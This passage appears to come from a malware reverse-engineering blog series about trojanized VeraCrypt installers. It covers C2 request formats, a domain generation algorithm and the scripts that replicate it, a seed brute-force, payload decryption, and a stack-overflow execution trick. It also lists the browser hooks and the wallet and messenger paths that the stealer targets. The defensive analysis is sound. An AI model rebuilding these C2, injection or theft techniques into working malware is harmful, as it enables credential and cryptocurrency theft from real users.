Next, it loads proxy.txt and mask.txt, that were dropped on the disk and encrypted with the ID (see Part 1). Their meaning will become clear soon.

I’m therefore renaming sub_40460C to loadMaskProxyAndGenerateRandomHash.

More payloads in sight

Back to main_stuff, the next function called is sub_4052DD.

This function receives two pointers, and a boolean, and returns a buffer. The boolean determines whether the buffer is filled with the content of a file read from disk or whether the content is the result of a network request (also cached to disk for future calls). The two pointers correspond to 32 and 64-bit payloads, which are handled separately.

Although that’s what the function is designed to do, the arguments passed to it will direct the function to only fetch a 32-bit payload from an online resource and write it to disk, as outlined below.

The part from sub_4052DD that gets run, function calls are renamed by me

The function that I named readFileAndCheckIfMZ is self-explanatory:

readFileAndCheckIfMZ

In turn, checkIfMZ simply checks that the buffer is larger than 0x400 bytes and starts with MZ: return size > 0x400 && *buf == 'M' && buf[1] == 'Z';

In other words, if the payload does not already exist on disk, cannot be loaded and decrypted, or is not an executable file, we go to getPayloadAndWriteToFile.
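The cache-then-download logic can be summarized with the following Python sketch. The check mirrors the C expression quoted above; read_cached and fetch_remote are hypothetical callables standing in for readFileAndCheckIfMZ’s file access and for getPayloadAndWriteToFile, respectively.

```python
def check_if_mz(buf: bytes) -> bool:
    """True if the buffer is larger than 0x400 bytes and starts with 'MZ'."""
    return len(buf) > 0x400 and buf[:2] == b"MZ"


def load_payload(read_cached, fetch_remote) -> bytes:
    """Return the cached payload if it looks like a PE file, else fetch it.

    read_cached:  hypothetical callable returning the decrypted file
                  content, or None if the file is missing or unreadable.
    fetch_remote: hypothetical callable that asks the C2 for the payload.
    """
    cached = read_cached()
    if cached is not None and check_if_mz(cached):
        return cached
    return fetch_remote()
```

The size test is only a cheap sanity check: a legitimate PE file needs far more than two magic bytes to be valid, but this is all the sample verifies.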

Communication with C2 server

The function getPayloadAndWriteToFile is similar to readFileAndCheckIfMZ but instead of reading a file, it calls sub_404665(&bin32or64, &payloadSize). The first argument is the string bin|int32 in our case, and the second argument will receive the size of the returned buffer.

This function sub_404665 is slightly long, but can be approximated with the following pseudo-code:

gotValidResponse = false
while (!gotValidResponse) {
  request = RSAEncryptAndReverseAndBase64(randomNameMd5 + '||' + proxy + '||' + id + '||')
  request += '||delimiter||'
  request += base64("bin|int32")  // YmlufGludDMy
  request += '||delimiter||'

  send request as POST data to http://proxy:80/p1.php
  if there is randomNameMd5Md5 in response, gotValidResponse = true, break
  otherwise, change "proxy" domain to an alternative one
}
decryptedPayload = response[32:] ^ (pad of randomNameMd5)

Several interesting things happen here.

RSA encryption of POST data

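First, what I called RSAEncryptAndReverseAndBase64 performs an RSA encryption operation using the following hardcoded 2048-bit RSA public key, reverses the resulting bytes, and base64-encodes them. The reversal is most likely there because CryptEncrypt returns its ciphertext in little-endian byte order, whereas most other RSA implementations expect big-endian. The encryption relies on the old CryptEncrypt API.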

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxxUk/C3M413qwlO04xFJ
EbzBzFz7Sy+mv1bSq4uD2L3dCZLeDKgsdRm83N8y0/kjqa1mv28l0SwgtmOA6Z02
0GM3CCfgHhv/1gIVWahHC8KKnfEmg4G1dUYR2C22ltPsF/DPrruWk/kExUQtzAu3
hWPz2Qe7ZhEAbcpvfYfXU6iXB6pN+iiRjg8wzqPGlwoYNfOFy3HqePAW/IKKtYzE
hCKD9PaIhAQQlJwcYVSybopHdL30lzMxKmop6I7kwxVieukaDLDQiU68nExc9Fyg
U1TXPCkNN+BvgdNwjPrRNMX29GHwc2aZK9wnMXuO59WDAY3M4invvdukhEcgEtIU
2QIDAQAB
-----END PUBLIC KEY-----

The plaintext will look like this:

"30c6f2381c9c26dbb31d97e0496f6589||veracrypto.com||89D5ACAA6B4C4765CFD8F8||"

The encrypted string is concatenated with other strings, as shown in the pseudo-code. An example of the first HTTP request sent to the C2 server is as follows.

POST /p1.php HTTP/1.1
Host: veracrypto.com
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 396

kb5jgFvQtojqoDpahHuEs0A7UL44jxXCNaVRXc4+krFp27OHCi5onU2gHMjCTeZD
MX0GDJjX9U42PCx6eVx0cIrhccO/Hz/GUdkM0NbFTuNiBEpxC+c0eaRmhlOa7Bwo
RIcXia+KN3vsOZTeklqu6wkZbgIcVtUvUxJ2yr60X7XT8ClS0WHP+IOHrsxJhMJ9
W7u+UkCWbIJnBdzELKDxNQTUQTV6185byijg0iBTwRAktMLO/dTiixcawF3yhmau
JUgoXd579HlrjUKrp2zHa+U/RCca1Ql2NNxEnv7tDK48orahvYFxyz8VbGOUryoE
FiIeapZx93mpZtNHGkq2Dg==
||delimiter||YmlufGludDMy
||delimiter||

Although this first request does not contain very thrilling information, if we are provided with only network traffic captures, it’s not possible to decrypt it without the RSA private key. This will have consequences soon, when I try to decrypt the server’s response to another, similar malware sample.
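For reference, the layout of such a POST body can be taken apart with a few lines of Python. This is a sketch under my own naming (split_post_body is hypothetical, and the three-byte blob in the example is a stand-in for the real ciphertext). It only separates and base64-decodes the fields, since the first one stays opaque without the RSA private key.

```python
import base64

DELIM = "||delimiter||"


def split_post_body(body: str):
    """Split a /p1.php POST body into (encrypted_blob, command)."""
    fields = body.split(DELIM)
    # The base64 text may be wrapped over several lines; b64decode
    # discards the embedded newlines by default.
    blob = base64.b64decode(fields[0])
    command = base64.b64decode(fields[1]).decode("ascii")
    return blob, command


# Stand-in body: "QUJD" replaces the real RSA ciphertext.
blob, command = split_post_body("QUJD\n||delimiter||YmlufGludDMy\n||delimiter||\n")
print(len(blob), command)
```

With a real capture, the decoded blob is the reversed RSA ciphertext and the command is the plain string sent after the first delimiter.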

Domain Generation Algorithm

The next interesting thing happens when the request fails (e.g., the hardcoded domain cannot be contacted): a domain generation function (sub_404B33, which I called changeToAlternativeDomain) outputs new ones!

The high-level idea of the algorithm is the following.

// those global variables are initialized elsewhere
numberOfAttempt = 0;
proxy = "veracrypto.com";

changeToAlternativeDomain() {
  if (numberOfAttempt > 0)
    proxy = domainGenerateAlgorithm(numberOfAttempt);
  else
    proxy = decrypted content of proxy.txt
  numberOfAttempt++
  Sleep(1000)
}

When first called, the same hardcoded domain “veracrypto.com” will be returned and tried again. Upon the following calls to changeToAlternativeDomain, the domain will be generated by domainGenerateAlgorithm (sub_4043D5).

Recall mask.txt? Now, it enters the picture, and is actually a format string for sprintf!

The decrypted mask is %d_yq_%02u.%02u.%02u. It is populated with the number of attempts to reach a server and the current date. The result is hashed using MD5, and “.com” is appended to the hash.

GetLocalTime(&SystemTime);
wsprintfA(formatedDate, mask, numberOfAttempt, SystemTime.wDay, SystemTime.wMonth, SystemTime.wYear);
formatedDateMd5 = md5(formatedDate);
lstrcatA(formatedDateMd5, ".com");

If you take today as an example, you will get the first alternative domain to be:
md5("1_yq_09.03.2020")+".com", which gives 7a491cdec4b304f67966b85219f2fc94.com.
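The same computation can be sketched in Python, reusing the decrypted mask directly as a printf-style format string. The function name dga_domain is mine, and the sketch assumes the argument order shown in the decompiled call (attempt, day, month, year).

```python
import hashlib
from datetime import date

MASK = "%d_yq_%02u.%02u.%02u"  # decrypted content of mask.txt


def dga_domain(attempt: int, day: date) -> str:
    """Format the mask with the attempt counter and date, then MD5 it."""
    label = MASK % (attempt, day.day, day.month, day.year)
    return hashlib.md5(label.encode("ascii")).hexdigest() + ".com"


print(dga_domain(1, date(2020, 3, 9)))
```

The call above hashes the string 1_yq_09.03.2020, the same input as in the example.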

Server response?

Now, unfortunately, at the time of writing, veracrypto.com is no longer operational. It resolves to 176.114.8.24, but the server seems to be down. Also, today’s alternative domains do not exist.

I wanted to know if there was any other alternative domain for any day in the past that points to another server where I could fetch the server’s response.

I made a quick PHP script to replicate the Domain Generation Algorithm (DGA) and enumerate up to seven alternative domains per day in the past year.
(Note: seven is the hardcoded maximum, after which the counter loops back)

<?php
$date = new DateTime('today -1 year');
$end = new DateTime('today +1 week');
while ($date <= $end) {
  for ($attempt=1; $attempt<=7; $attempt++) {
    $domain = $attempt.'_yq_'.$date->format('d.m.Y');
    echo $domain."\t";
    $domain = md5($domain).'.com';
    echo $domain."\t";
    $ip = gethostbyname($domain);
    if ($ip === $domain) echo "no";
    else echo $ip;
    echo "\n";
  }
  $date->modify('+1 day');
}

Unfortunately, none still exist 😦

Generating and resolving alternative domains

How am I supposed to study this malware if I can’t fetch the next payload?

Family history

In Part 2, I identified another malware sample that contained the same weird-looking domain as I found hardcoded in this one. It turns out that this other sample also performs the same type of HTTP POST request to a /p1.php URL. It definitely sounds like an earlier version of our current sample.

From this point on, I will investigate the payloads downloaded by this older sample from May 2018 that was bundled with a SlimPDF Reader installer. That’s the only thing I have to analyze further. Given the similarities in the old and recent sample, we can assume that the recent payload I couldn’t capture due to the server being down is of the same nature. However, since the C2 server controls what gets returned and executed, this could have changed at any time.

Old sample PCAP

I downloaded the PCAP from Hybrid-Analysis in the hope of finding the next payload returned by the server, circa 2018.

HTTP requests made by the earlier sample

There seems to be a number of requests made to /p1.php.

Let’s focus on the first one.

First HTTP request/response by the older sample

The request matches perfectly what our sample does! This is strong evidence that the old sample from 2018 is from the same family as today’s sample bundled with VeraCrypt.

About the response though, it is encrypted. We first need to figure out whether it’s even possible to decrypt it.

Brute-forcing the HTTP response’s encryption key

The HTTP response is decrypted (XORed) with randomNameMd5, which is generated “randomly” at runtime and contained in the HTTP request, but encrypted using the RSA key. We don’t have access to it from the network traffic.

However…

The code also checks whether the MD5 of randomNameMd5 (which I had called randomNameMd5Md5 earlier) is present in the response, and apparently it should be placed first given the line decryptedPayload = response[32:] ^ (pad of randomNameMd5). If you look at the Wireshark screenshot above, you can clearly see that the server’s response starts with what seems to be an MD5 hash.

The problem becomes knowing x given y=md5(x), and given x is also a hash.

Can I brute-force x? No.

But where does the entropy actually come from?

A rand() function.

And what’s the seed? The performance counter! To be precise, the lower DWORD of the counter. That’s 32 bits. And that is brute-forceable!

Here is the function that generates the random name.

generateRandomName function

And the random number generator, which is a linear congruential generator.

The rand() implementation

The implementation seeds the random number generator once with the performance counter. If we can find the value of this counter, we can derive the randomness and the generated name, and thus we can get randomNameMd5 and decrypt the server’s response.

Lazy as I am, I decided to implement the brute-force attack of the seed in PHP.

We know the target randomNameMd5Md5 is 93b3cdfdd3ef22d00d6807e7a0c054cb from the network capture. Let’s iterate the seed from 0 to 0xFFFFFFFF, generate the name with the randomness that comes out of it, and hash it twice to compare with this target hash. This operation could be easily parallelized, and probably adapted for hashcat to gain speed. However, this was fast enough for my purpose. It just took a few minutes.

<?php
$target_md5 = "93b3cdfdd3ef22d00d6807e7a0c054cb";
$alpha='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

function get_rand(&$pc) {
  $v0 = ((0x41C64E6D * $pc) & 0xFFFFFFFF) + 12345;
  if ($v0 < 1)
    $v0 = 0xC5531B80;
  $pc = $v0;
  return (($v0 >> 16) & 0x7FFF);
}

for($pc_i=0; $pc_i<=0xFFFFFFFF; $pc_i++) {
  $name = '';
  $pc = $pc_i;
  for($i=0; $i<9; $i++) {
    $name .= $alpha[get_rand($pc) % 62];
  }
  if (md5(md5($name)) === $target_md5) {
    echo "\nFOUND SEED: PC (".dechex($pc_i)."), name '$name', md5 '".md5($name)."'\n";
    break;
  }
  if ($pc_i % 100000 == 0) {
    echo "[".dechex($pc_i)."]...\n";
  }
}

Let’s run it…

The seed was successfully brute-forced

Success! randomNameMd5 = 891dcadffb0e7f8f05693160cef0d6ab

This was a wild guess, betting that the old sample used the same random number generator and was checking the same information from the server’s response.

We can now decrypt the server’s response:

php > $md5 = "891dcadffb0e7f8f05693160cef0d6ab";
php > $enc = substr(file_get_contents('first-request-response.bin'), 32);
php > file_put_contents('first-request-response.dll', $enc ^ str_repeat($md5, ceil(strlen($enc)/32)));

The response is actually a DLL file, which I uploaded to VirusTotal since it wasn’t known. It got detected by 32/70 AVs. This file has a built-in path for the PDB debug info, with a username and a project name!

The first payload downloaded by the old sample appears to be named as NukeSuccses14 made by Andre

This payload is apparently part of a project called “NukeSuccses14” (sic) that Mr. Andre was storing on his desktop.

Accordingly, let’s name this DLL as int32.dll.

Smarter way to decrypt payloads

Now that I see the mysterious hash and the encrypted server’s response again, I feel bad.

Typically, when “encrypting” an executable by XORing it with whatever repetitive pattern, there are areas full of zeros in the executable that will be “encrypted” as the pattern itself. This is because zero is neutral for the XOR operation, i.e., zeros XOR something = something. When that something is an encryption key, the ciphertext is simply the key itself.
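A toy example makes the leak visible. The snippet below is only a sketch: the "executable" is a made-up header followed by a run of zero bytes, and xor_repeat is my own helper name.

```python
from itertools import cycle


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


key = b"891dcadffb0e7f8f05693160cef0d6ab"
# Toy "executable": a short header followed by a long run of zero bytes,
# as commonly found in PE padding.
plain = b"MZ\x90\x00\x03" + bytes(96)
cipher = xor_repeat(plain, key)

# The zero run starts at offset 5, so the key shows up rotated by 5.
rotated = key[5:] + key[:5]
print(rotated in cipher)
```

The rotation simply depends on where the zero run starts relative to the key length of 32.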

Check the ciphertext again. You can see the hash I just cracked at several places, minus some rotations.

The XOR key “891dcadffb0e7f8f05693160cef0d6ab” appears rotated at several places

This trick will help us decrypt the next payload without any effort, by just extracting the strings from the executable and hashing a sliding window of 32 bytes until we find a match.

$ strings -32 next-request-response.bin > next-request-response.bin.txt

<?php
$file=file_get_contents('next-request-response.bin');
$hash=substr($file, 0, 32); //82c114e7f40404f5289864c77ad9b69d
$strings=file_get_contents('next-request-response.bin.txt');
for ($i=0; $i<=strlen($strings)-32; $i++) {
  if (md5(substr($strings,$i,32))===$hash) {
    echo substr($strings,$i,32);
    break;
  }
}
// output: 43f8e28e07c451205657dba8108f4a79

Old sample’s PCAP

After the int32.dll payload is fetched, the sample makes a new request to the same URL with the following POST data.

BfctndONzetT8JUTn+Xh3hhMsE4gcI1a38BjzNy9hjK1ZWgTflYe3MB0eePGUhJC
3hNg3FgLP7oYa04BhBtYONdNJ+aIcVlBIxHdSc1GGx0VDqQ6/unYKIvH3h7Es71d
W4wmVg9jwI+fTxOtAduv0x0DPtZrRko9kz7nySpHcox2uBEVlxtnjLGGPgWTRTrx
j9ktuWcRZCe59oK92RUS7GaIwLMJonqpm4RDUTIY+BQ0a0LcjyieZqG28pvRtyR2
ivWvWib9BsLa+NAtn7TQhrD5r7C21wMJiLFFsOSjt3eDeHxVK1QOn58OP1LpLcrq
l0bS38WsdbnFHSCtuR4i5w==
||delimiter||aW5mb3w2fDF8MXwwfEpHdGY1SGRCdFF8ZTFDM3JkSnwwfDIzNzEwNDB8bWFpbnx0
ZXMxfDEwMjR8NjE3
||delimiter||

Note that the first part before the delimiter is again encrypted. However, the rest is simply base64-encoded. For instance, aW5mb3w2fDF8MXwwfEpHdGY1SGRCdFF8ZTFDM3JkSnwwfDIzNzEwNDB8bWFpbnx0ZXMxfDEwMjR8NjE3 decodes to info|6|1|1|0|JGtf5HdBtQ|e1C3rdJ|0|2371040|main|tes1|1024|617.
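Decoding these fields takes only a few lines of Python. In this sketch, decode_command is a name of my choosing, and splitting on the pipe character is an assumption based on how the decoded strings look; I do not know the meaning of the individual fields.

```python
import base64


def decode_command(field: str) -> list[str]:
    """Base64-decode a command field and split it on the '|' separator."""
    text = base64.b64decode(field).decode("ascii")
    return text.split("|")


fields = decode_command(
    "aW5mb3w2fDF8MXwwfEpHdGY1SGRCdFF8ZTFDM3JkSnwwfDIzNzEwNDB8bWFpbnx0"
    "ZXMxfDEwMjR8NjE3"
)
print(fields[0], len(fields))
```

The first element is the command name (info here), followed by its parameters.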

This is still a little bit confusing, and the server’s response is empty beyond the expected hash.

In the third request, the non-encrypted part shows cGFzc3xn, which decodes to pass|g. In turn, the server returns a bigger payload than the first one, which I already decrypted in the above section with the more efficient decryption algorithm.

Let’s name this second payload as pass.dll.

This one doesn’t contain debug information.

On VirusTotal, pass.dll is detected by 34/69 AVs. It is labeled as “Password-Stealer” and “TrojanSpy.Stealer”, and is apparently made in Delphi…

Some other requests are re-runs of the first one (with a different ciphertext, but maybe with the same plaintext). The rest of the requests show a decodable string that reads ping, with an empty response. Both kinds of requests are made every 20 seconds…

Executing the payloads

One important detail remains: there is one more piece of code to analyze from data.dll. How is the first payload, int32.dll, executed?

This time, unlike the convoluted ways we have seen previously, the DLL is not written to disk. Rather, it is directly injected into dllhost.exe’s memory.

We now have enough information to understand the main_stuff function we started from.

main_stuff shows an overview of data.dll’s payload

The process dllhost.exe (from %windir%\System32) is created, and its process handle is passed to the last function sub_4040CC.

The injection works roughly as described in Method #2: PE Injection from https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process.

First, data.dll allocates some memory in dllhost.exe through VirtualAllocEx. Then it loads the content of int32.dll into it along with another function (sub_409158) from data.dll. I’m not sure what that one is doing, but it probably has to do with properly rebasing the image. Finally, a new thread is created through CreateRemoteThread or RtlCreateUserThread.

int32.dll

Maybe after all this effort and little malicious activity (beyond Firefox/IE config change), we can finally get to find some nasty things?

After I again renamed several global variables as I did before, I explored the code of int32.dll. It is a relatively complex piece of software, and it would be pretty difficult to fully understand its functionality.

If we stick only to the main logic and some key string literals, I think that’s enough to get a picture.

The main logic goes as follows.

int32.dll main payload

First, the program checks whether it is running within dllhost.exe, in which case it starts svchost.exe and injects itself into it. It sets up inter-process communications through the named pipe \\.\pipe\[ID]. I can see a bunch of other things as well, though I’m not fully sure what they are about. I will share some key debug messages later below.

It then assumes it is running inside other processes, such as iexplore.exe (IE), chrome.exe, firefox.exe, and explorer.exe. For each of these processes, the payload is adapted.

From what I understood, for the browsers, the idea is to hook network-related methods to be able to intercept the traffic. The fact that before the hooking, the same method loadMaskProxyAndGenerateRandomHash as we have seen in the previous payload is called makes me think that, once hooked, the network request calls may directly communicate with the C2 server and possibly leak information.

This is an excerpt from the Chrome hooking logic. The strings are somewhat meaningful.

Hooking Chrome SSL-related functions?

In svchost.exe, the function gethostbyname is hooked as well, which may be used to lie about certain domain name resolutions, and maybe redirect the victim’s traffic.

The function at sub_1000A9F0 runs explorer.exe and performs a number of UI operations using WindowFromPoint, SendMessageA, GetWindowPlacement, GetWindowRect, ScreenToClient, ChildWindowFromPoint, MenuItemFromPoint, GetMenuItemID, PostMessageA, MoveWindow, SHAppBarMessage, …

I also found the same RSA public key we already found in data.dll, confirming that we are dealing with the same family, likely same author.

Other interesting things I found:

  • “X-HeyThere: 5eYEp80n3hM”
  • “As we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking was for the gloopy ones and that the oomny ones use, like, inspiration and what Bog sends. For now it was lovely music that came to my aid. There was a window open with the stereo on and I viddied right at once what to do.”???
  • “AVE_MARIA”???
  • “webinject loaded!” in a function called when setting hooks on IE network functions.
  • “<script>window.location.href = window.location.href;</script>” appears in the function that hooks InternetReadFileExW (IE).
  • “--disable-http2 --use-spdy=off --disable-quic” is used in the hook for CreateProcessInternalW (kernel32.dll) when the process to create is chrome.exe. This adds arguments to Chrome that disable HTTP2, SPDY and QUIC, which are known to create problems for traffic-intercepting malware.
  • Relatedly, there is “--no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=” for Chrome as well, which is used to start Chrome from sub_1000A9F0.

From this brief analysis of int32.dll, it is reasonable to assume this is traffic-intercepting malware that hooks network functions in main browsers to perform man-in-the-browser attacks. There is also a graphical component to it, related to its need to disable hardware acceleration and various graphics features, but I’m not able to conclude anything more about this. The sample also establishes persistence by creating an entry under HKLM\Software\Microsoft\Windows\CurrentVersion\Run.

pass.dll

This payload was indeed compiled from Delphi as indicated by the string SOFTWARE\Borland\Delphi\RTL. It exports the function Do.

Interesting functions and strings include:

  • sub_414E3C(“Coins”)
    • “%appdata%\Electrum\wallets\”, “wallet.dat”, “electrum.dat”
    • “MultiBitHD\mbhd.wallet.aes”, “mbhd.checkpoints”, “mbhd.spvchain”, “mbhd.yaml”
    • “Monero\.address.txt”, “.keys”
    • “\BitcoinBitcoinQT\wallet.dat”
  • sub_41485C(“Skype”)
    • “main.db”
  • sub_413FB8(“Telegram”)
    • “%appdata%\Telegram Desktop\tdata\”, “D877F783D5*,map*”
  • sub_414AE4(“Steam”)
    • “\Config\*.vdf”

I guess it is safe to assume here that, given its label of “PasswordStealer”, this payload is actually interested in grabbing cryptocurrency wallets, Skype and Telegram info…

The behavior actually looks very similar to Azorult, a malware family from 2016. Azorult also grabs browser histories, saved credentials, etc. This behavior is likely implemented in this payload as well, as indicated by the use of CryptUnprotectData, which decrypts the cookies and passwords that Chrome protects under a Windows user account secret.

Conclusion

VeraCrypt was the victim of “squatting phishing”: some bad actors registered the phishy domain vera-crypt.com, which distributed a modified installer and portable version of VeraCrypt for Windows. Some of the payloads, intermediate registered domain names and server IPs seem to point to some people in Ukraine.

The modifications of VeraCrypt allowed the authors to fetch payloads from their C2 server whenever VeraCrypt[-64].exe is run, which would ultimately, after lots of evasion techniques, load and run various known malware payloads. Although I am not sure of the exact final payload that was served in the case of VeraCrypt, the analysis of a previously known sample from the same family of modified installers showed two payloads: a traffic-interception malware that has capabilities to modify network traffic despite HTTPS by setting itself as a man-in-the-browser through network function hooking; and a browser history & password/cryptocurrency wallet/chat credentials stealer.

Thanks for following my first malware reverse-engineering write-up til this point!

For comments and suggestions, ping me at @xavier2dc.

An Analysis of Modified VeraCrypt binaries (Part 2)

Continuing the analysis of the fake VeraCrypt Windows installer distributed on httx://vera-crypt[.]com, I am now reverse-engineering the downloaded payloads. Before I can jump to the main functionalities of the malware, I have to go through obfuscation and anti-analysis techniques. This part goes into detail about these techniques, and is targeted at above-beginner reverse-engineers. I am also sharing IDAPython scripts to decrypt encrypted strings. For the real payload analysis, see Part 3.

Part 1 summary: The distributed binary is a modified VeraCrypt installer that installs a modified copy of VeraCrypt which fetches a first stage payload from a remote server, which in turn downloads a bunch of binaries and stores them on disk, some of them encrypted (XORed) with an ID generated by the server.

Second-stage payload

After the first-stage payload drops several files on disk, it runs the [ID].exe image:

Making the [ID].exe file path, the URL, downloading and writing the payload to disk, and executing it

Let’s dig into [ID].exe! Although I was analyzing the 64-bit modified VeraCrypt and the first-stage payload was 64-bit accordingly, this executable is 32-bit.

Obfuscated starting function

Complications arise.

The binary is designed to waste my time.

First, the entry point is a function that places data on the stack, an integer at a time, with hundreds of mov instructions. Sometimes, this is a strategy malware uses to reconstruct a code section into the stack then jump to it. But not this time. This is just plain useless.

Lots of mov instructions to slowly put data on the stack

3,820 boring mov instructions and three useless functions later, we have something.

Reconstructed main function of [ID].exe

The waste_my_time functions (naming is mine) were designed to be useless, yet fake that something normal is happening to lure tools that use static analysis into thinking that this is a legit program.

I’m not going to detail what they do, because actually, they are never executed… Indeed, the loop variable is incremented by 2 starting from 0, thus it remains even and therefore never takes the value 143. This is what we call dead code.
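The parity argument is easy to check with a couple of lines of Python. The loop bound below is hypothetical (I did not take it from the binary); only the start value, the step and the compared value come from the description above.

```python
TRIGGER = 143   # value the guard compares against
BOUND = 1000    # hypothetical loop bound, not taken from the binary

# The counter starts at 0 and advances by 2, so it only takes even values.
reached = any(i == TRIGGER for i in range(0, BOUND, 2))
print(reached)
```

Whatever the bound, an odd trigger value can never be hit by an even-only counter.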

The real start of this program is located in what I named the real_main function.

Start ok

I should have seen it coming. In previous payloads, the author(s) often made use of the OutputDebugStringA function, likely to help them (lazily) build the program. That’s the equivalent of putting printf("I'm here") everywhere to debug a program by observing the console output. I should have started looking for calls to this function first. Good to know for next time.

The function tries to load the DLL named after the md5 hash of the lowercased username (see Part 1 for how it’s been put to disk), and call the exported function data. If successful, it loads and decrypts the big_log file, and jumps to it somehow.

[ID].exe main payload

For the sake of digging into reverse-engineering details and getting exposed to obfuscation techniques, I will describe all these steps, although we sort of know that the next useful thing to look at is that big_log file.

data()

Let’s load the md5(lower(username)).dll first, and look at the data function.

Part of the data function

The decompiled code is a bit messy, so we will study the assembly directly.

Basically, the function gets the path of the %temp% folder (GetTempPathA) and appends “start3.txt” to it, to be used later. Then it gets information about the available memory through GlobalMemoryStatusEx and checks whether there’s more than 4GB of RAM, in which case it continues to the next check. If not, or if there’s an insane amount of memory (like, the higher 4 bytes of the DOUBLE DWORD is negative?), the function returns. If there is less than 4GB available, at least there should be 1GB to proceed further.

The next check is about trying to figure out whether the program is being emulated or dynamically analyzed in a framework that skips Sleeps. It does so by measuring whether a Sleep has been executed and enough time has elapsed. Otherwise, this indicates the program isn’t running in a normal environment, is likely being analyzed, and therefore the program wants to terminate.
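The idea behind this check can be sketched in Python as follows. The delay and tolerance values are assumptions of mine, as is the function name; the sample relies on Sleep and a time measurement, but I am not reproducing its exact thresholds. The sleep and clock parameters are injectable so the logic can be exercised without waiting.

```python
import time


def sleep_was_skipped(delay_s: float = 0.5, tolerance: float = 0.9,
                      sleep=time.sleep, clock=time.monotonic) -> bool:
    """Return True if noticeably less time elapsed than the requested sleep."""
    start = clock()
    sleep(delay_s)
    elapsed = clock() - start
    return elapsed < delay_s * tolerance


# Simulate a sandbox that fast-forwards sleeps: the call returns immediately.
print(sleep_was_skipped(sleep=lambda seconds: None))
```

On a normal machine, calling sleep_was_skipped() with the defaults really sleeps and reports that nothing was skipped.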

End of the data function

The function then tries to check for the presence of %temp%\start3.txt, which should not normally exist. If it does, this likely means that an analysis environment is faking the presence of the file to let the program continue to run (allegedly it needs that file, right?).

Finally, the program checks whether there are at least two CPU cores. Single-core/single-thread CPUs are too old to be a realistic environment nowadays.

In conclusion, data is just an anti-analysis function.
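Put together, the decision made by data can be summarized by the following Python sketch. It reflects my reading of the checks rather than the exact code: the function name and parameters are hypothetical, the inputs are passed in instead of being measured, and I treat the RAM test as "at least 1GB and not an absurd value".

```python
GIB = 1 << 30


def environment_looks_real(total_ram: int, sleep_honoured: bool,
                           start3_exists: bool, cpu_cores: int) -> bool:
    """Combine the four anti-analysis checks into one verdict."""
    if total_ram < 1 * GIB:       # too little memory for a real machine
        return False
    if total_ram >= 1 << 63:      # "insane" value: sign bit of the 64-bit size set
        return False
    if not sleep_honoured:        # Sleep was skipped or fast-forwarded
        return False
    if start3_exists:             # %temp%\start3.txt should not exist
        return False
    return cpu_cores >= 2         # single-core machines are rejected


print(environment_looks_real(8 * GIB, True, False, 4))
```

Any single failed check is enough for the function to give up.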

Loading, decrypting, overflowing, jumping

After making sure the program isn’t run in an analysis environment, the next payload is executed.

The interesting thing is how the payload is executed.

It is not a full-fledged EXE or DLL, it is just pure code. To be executed, it has to be copied to the stack at the right location then jumped to. It also has to be PIC (Position-Independent Code), unless the hardcoded addresses are calculated accurately.

big_log is 4,257 bytes. Keep in mind this number.

Decrypting

To “decrypt” big_log the way [ID].exe does, you can simply do (PHP):

php > $id = "89D5ACAA6B4C4765CFD8F8";  //replace with your ID
php > $bl = file_get_contents($id.'\\big_log');
php > file_put_contents($id.'\\big_log.dll', $bl ^ str_repeat($id, ceil(strlen($bl)/strlen($id))));

Looking at the decrypted content, I found the end of the file interesting.

End of decrypted big_log

Plenty of NOPs as you would see for padding, then 8 bytes and 0xFF. We’ll get back to that later.

Overflowing

The function, which I called copy_to_stack, allocates 4,244 bytes on the stack, then calls memmove(&var_1094, &biglog, 4257), with var_1094 being located just 0x1094 (4,244) bytes below EBP.

You see what’s going to happen?

Copy the decrypted payload to the stack

Buffer overflow!

The copy of the big_log code (4,257 bytes) to the stack is designed to overflow the allocated buffer (only 4,244 bytes) and overwrite part of the stack. Namely, the overflow is of 4257-4244 = 13 bytes. What is being overwritten?

In the stack at EBP, you are supposed to find the saved EBP (pushed in the function prologue at .text:004019F0 here) of the previous stack frame, to be restored during the epilogue (.text:00401A16 here).

At EBP+4, you find the return address, which is the address of the next instruction in the previous function, that’s where the EIP will go after the retn at 00401A17.

Then, at EBP+8 and EBP+C, there are the arguments to the function copy_to_stack, which were in this case the address of the buffer that contains big_log, and its size.

I debugged [ID].exe and put a breakpoint on this function. Before and after the memmove, you can see what’s changing around EBP (19EC7C here).

The previous return address (402E69) has changed to 402B39. The saved EBP has been NOP’d and the first and a bit of the second argument have been overwritten.

That means when copy_to_stack finishes, EBP becomes 90909090, and the flow continues at 402B39. And what do we find at this address, which is still located in [ID].exe’s code?

Code at 402B39

That’s a jmp esp.

And what is ESP here? Let’s count: at the beginning of copy_to_stack, after the initial push EBP, we have EBP=ESP, then there are three pushes that are compensated by the add esp, 12. Then, ESP=EBP, and the pop ebp consumes one DWORD, making ESP=EBP+4 (now pointing at the return address). After retn consumes another DWORD, ESP becomes EBP+8, pointing to the last 5 bytes of big_log at 19EC84: E95FEFFFFF.

E95FEFFFFF in turn is the machine code for a relative jmp with a displacement of FFFFEF5F, the two’s complement of 10A1, making it effectively go backward by 0x10A1 bytes from EIP after the jump. 0x10A1 is actually 4,257, the size of big_log. That means this jump goes back to the beginning of the payload.
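The arithmetic can be double-checked with a short Python snippet. It only uses numbers quoted above (buffer size, payload size, and the last five bytes of big_log); the variable names are mine.

```python
import struct

BUF_SIZE = 0x1094        # bytes reserved for var_1094 (4,244)
PAYLOAD_SIZE = 4257      # size of big_log

# Bytes written past the buffer: saved EBP (4), return address (4),
# then 5 bytes of the caller's arguments.
overflow = PAYLOAD_SIZE - BUF_SIZE

# Last 5 bytes of big_log: opcode E9 followed by a little-endian rel32.
tail = bytes.fromhex("E95FEFFFFF")
opcode = tail[0]
(rel32,) = struct.unpack("<i", tail[1:])

# A rel32 jump is relative to the address of the next instruction,
# which here is the end of the payload.
target_offset = PAYLOAD_SIZE + rel32
print(overflow, hex(opcode), rel32, target_offset)
```

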